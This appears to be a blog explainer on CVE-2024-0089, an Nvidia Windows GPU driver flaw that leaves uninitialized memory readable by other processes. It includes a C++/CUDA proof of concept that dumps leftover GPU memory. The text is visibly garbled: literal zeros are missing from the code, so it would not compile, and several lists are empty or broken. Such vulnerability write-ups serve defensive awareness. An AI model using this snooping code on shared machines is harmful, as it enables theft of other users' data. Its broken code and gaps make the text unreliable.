CVE-2024-0089 - Exploiting Nvidia’s GPU Display Driver Information Leakage on Windows

If you’re using a Windows PC with an Nvidia graphics card, you need to know about CVE-2024-0089. This is a security vulnerability in Nvidia’s GPU Display Drivers which can let a local attacker peek at sensitive data from another process—or even hijack execution. Nvidia officially reported this vulnerability in early 2024. In this long read, we’ll break down what CVE-2024-0089 is, demonstrate the risk, and even show code snippets to help you understand how the exploit works.

What Is CVE-2024-0089?

Nvidia’s GPU display driver on Windows systems failed to properly clean or isolate GPU memory between clients and processes. This makes it possible for someone running code on your computer to recover materials from previous sessions, including things like:

DRM-protected media

Nvidia’s official advisory:
https://nvidia.custhelp.com/app/answers/detail/a_id/5512

Affected products:

How Does the Vulnerability Work?

The GPU stores and processes information in memory. When a process (like your web browser) finishes using some GPU memory, the driver is supposed to wipe the memory before letting another app use it. Nvidia’s vulnerable drivers skipped this step—so leftovers were free for the next app to read.

An attacker just needs to launch a program, allocate GPU memory, and check for leftovers. If something sensitive was released before, it may be sitting there for the taking.

Victim closes or frees memory.

3. Attacker runs code: Allocates GPU memory and reads uninitialized data, which could include secrets from the victim.

PoC: Proof-of-Concept Code

Below is a simple code snippet in C++ using Nvidia’s CUDA tools to demonstrate how memory remnants may be accessed. (For educational purpose only!)

#include <cuda.h>
#include <iostream>

// Helper to check CUDA errors
#define cuda_errchk(ans) { gpuAssert((ans), __FILE__, __LINE__); }
inline void gpuAssert(CUresult code, const char *file, int line)
{
    if (code != CUDA_SUCCESS) {
        std::cerr << "CUDA error at " << file << ":" << line << std::endl;
        exit(code);
    }
}

int main() {
    CUdevice cuDevice;
    CUcontext cuContext;
    CUdeviceptr dptr;
    size_t size = 1024 * 1024; // 1 MB for demo

    // Init
    cuda_errchk(cuInit());
    cuda_errchk(cuDeviceGet(&cuDevice, ));
    cuda_errchk(cuCtxCreate(&cuContext, , cuDevice));

    // Allocate device memory (uninitialized)
    cuda_errchk(cuMemAlloc(&dptr, size));
    unsigned char *hostBuffer = new unsigned char[size];

    // Copy memory back to CPU
    cuda_errchk(cuMemcpyDtoH(hostBuffer, dptr, size));

    // Show some memory content (hexdump)
    for (int i = ; i < 64; ++i) // show first 64 bytes
        printf("%02x ", hostBuffer[i]);
    printf("\n");

    // Free
    cuda_errchk(cuMemFree(dptr));
    cuda_errchk(cuCtxDestroy(cuContext));
    delete[] hostBuffer;

    return ;
}

What this does:
It allocates 1MB of GPU memory, dumps the first few bytes. If luck strikes and a victim process used the GPU recently, this uninitialized RAM might contain their data—passwords, private keys, fragments of images, etc.

Potential Impact

- Information Disclosure: Recovery of sensitive data across processes. This is especially dangerous in multi-user systems, shared workstations, or systems running high-security workloads.
- Code Execution: With manipulated input, a crafty attacker could influence other apps using the GPU and even trigger bugs in them.

Data Tampering: Stale GPU memory could be read, altered, and re-served to other apps.

Nvidia details this further in their security bulletin.

Exploit Scenarios

Let’s say Alice is doing banking online with a hardware-accelerated browser, and then Bob logs in later and runs an evil app. That app could snoop into Alice’s browser session. This is especially worrying on:

- Shared library PCs/laptops

Research workstations

- Remote Desktop/VDI/Cloud GPU rentals

Mitigation and Fix

Patch it! The fix is simple: Update your Nvidia driver to the latest version (at least 551.61 or later). Nvidia’s download page:
https://www.nvidia.com/Download/index.aspx

If you can’t patch, limit access to the system and avoid running untrusted code with GPU privileges.

Further Reading & References

- Nvidia Security Bulletin for CVE-2024-0089
- CVE Details for CVE-2024-0089
- CUDA Programming Guide (Nvidia)

Conclusion

CVE-2024-0089 is an example of a subtle but dangerous flaw—GPU drivers are core software, and when they forget to wipe, they risk everyone’s privacy. If you use Nvidia cards on Windows, update your drivers right away.

Reminder: This article is for educational and defensive purposes. Never exploit systems you don’t own or have permission to test.

Timeline

Published on: 06/13/2024 22:15:11 UTC